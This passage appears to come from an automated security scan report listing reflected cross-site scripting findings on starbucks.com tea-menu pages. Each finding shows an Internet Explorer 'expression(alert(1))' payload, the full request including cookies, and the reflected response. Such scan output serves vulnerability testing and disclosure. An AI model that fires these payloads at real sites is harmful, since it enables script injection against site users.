This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/earl-grey-tea-latte?949d1"style%3d"x%3aexpression(alert(1))"6eaf867621e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:35 GMT
Connection: close
Content-Length: 42568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte?949d1"style="x:expression(alert(1))"6eaf867621e=1"/>
...[SNIP]...

1.796. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/green-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8da2d"style%3d"x%3aexpression(alert(1))"8c880f3ec91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8da2d"style="x:expression(alert(1))"8c880f3ec91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/green-tea-latte?8da2d"style%3d"x%3aexpression(alert(1))"8c880f3ec91=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:44 GMT
Connection: close
Content-Length: 42307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte?8da2d"style="x:expression(alert(1))"8c880f3ec91=1"/>
...[SNIP]...

1.797. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-awake-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c81c"style%3d"x%3aexpression(alert(1))"7da409656c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c81c"style="x:expression(alert(1))"7da409656c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-awake-tea-latte?9c81c"style%3d"x%3aexpression(alert(1))"7da409656c1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:33 GMT
Connection: close
Content-Length: 42304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte?9c81c"style="x:expression(alert(1))"7da409656c1=1"/>
...[SNIP]...

1.798. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-chai-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef62"style%3d"x%3aexpression(alert(1))"cb85efc8b12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eef62"style="x:expression(alert(1))"cb85efc8b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-chai-tea-latte?eef62"style%3d"x%3aexpression(alert(1))"cb85efc8b12=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:14 GMT
Connection: close
Content-Length: 42257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte?eef62"style="x:expression(alert(1))"cb85efc8b12=1"/>
...[SNIP]...

1.799. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-green-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66681"style%3d"x%3aexpression(alert(1))"aa6c3571345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66681"style="x:expression(alert(1))"aa6c3571345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-green-tea-latte?66681"style%3d"x%3aexpression(alert(1))"aa6c3571345=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:22 GMT
Connection: close
Content-Length: 42181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte?66681"style="x:expression(alert(1))"aa6c3571345=1"/>
...[SNIP]...

1.800. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/orange-blossom

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b3b"style%3d"x%3aexpression(alert(1))"d90ff2f9eda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b3b"style="x:expression(alert(1))"d90ff2f9eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/orange-blossom?69b3b"style%3d"x%3aexpression(alert(1))"d90ff2f9eda=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:25 GMT
Connection: close
Content-Length: 42425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom?69b3b"style="x:expression(alert(1))"d90ff2f9eda=1"/>
...[SNIP]...

1.801. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/passion

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff50"style%3d"x%3aexpression(alert(1))"adbc9364b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cff50"style="x:expression(alert(1))"adbc9364b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/passion?cff50"style%3d"x%3aexpression(alert(1))"adbc9364b13=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:49 GMT
Connection: close
Content-Length: 42330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/passion?cff50"style="x:expression(alert(1))"adbc9364b13=1"/>
...[SNIP]...

1.802. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/refresh

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec5e"style%3d"x%3aexpression(alert(1))"8df00c156e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ec5e"style="x:expression(alert(1))"8df00c156e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/refresh?9ec5e"style%3d"x%3aexpression(alert(1))"8df00c156e8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:48 GMT
Connection: close
Content-Length: 42359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/refresh?9ec5e"style="x:expression(alert(1))"8df00c156e8=1"/>
...[SNIP]...

1.803. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2295e"style%3d"x%3aexpression(alert(1))"d67e805d73d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2295e"style="x:expression(alert(1))"d67e805d73d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade?2295e"style%3d"x%3aexpression(alert(1))"d67e805d73d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:30 GMT
Connection: close
Content-Length: 42306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade?2295e"style="x:expression(alert(1))"d67e805d73d=1"/>
...[SNIP]...

1.804. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353c7"style%3d"x%3aexpression(alert(1))"a67357be292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c7"style="x:expression(alert(1))"a67357be292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea?353c7"style%3d"x%3aexpression(alert(1))"a67357be292=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:05 GMT
Connection: close
Content-Length: 42111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea?353c7"style="x:expression(alert(1))"a67357be292=1"/>
...[SNIP]...

1.805. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 860c2"style%3d"x%3aexpression(alert(1))"e6b6821f468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 860c2"style="x:expression(alert(1))"e6b6821f468 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade?860c2"style%3d"x%3aexpression(alert(1))"e6b6821f468=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:10 GMT
Connection: close
Content-Length: 42243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade?860c2"style="x:expression(alert(1))"e6b6821f468=1"/>
...[SNIP]...

1.806. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b08c"style%3d"x%3aexpression(alert(1))"3cfb7a5dbfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b08c"style="x:expression(alert(1))"3cfb7a5dbfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea?2b08c"style%3d"x%3aexpression(alert(1))"3cfb7a5dbfc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:43 GMT
Connection: close
Content-Length: 42165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea?2b08c"style="x:expression(alert(1))"3cfb7a5dbfc=1"/>
...[SNIP]...

1.807. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc369"style%3d"x%3aexpression(alert(1))"2ba0c3d405d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc369"style="x:expression(alert(1))"2ba0c3d405d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade?bc369"style%3d"x%3aexpression(alert(1))"2ba0c3d405d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:06 GMT
Connection: close
Content-Length: 42340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade?bc369"style="x:expression(alert(1))"2ba0c3d405d=1"/>
...[SNIP]...

1.808. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81de7"style%3d"x%3aexpression(alert(1))"adf0f936755 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81de7"style="x:expression(alert(1))"adf0f936755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea?81de7"style%3d"x%3aexpression(alert(1))"adf0f936755=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:22 GMT
Connection: close
Content-Length: 42131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea?81de7"style="x:expression(alert(1))"adf0f936755=1"/>
...[SNIP]...

1.809. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/vanilla-roobios-tea-latte

Issue detail

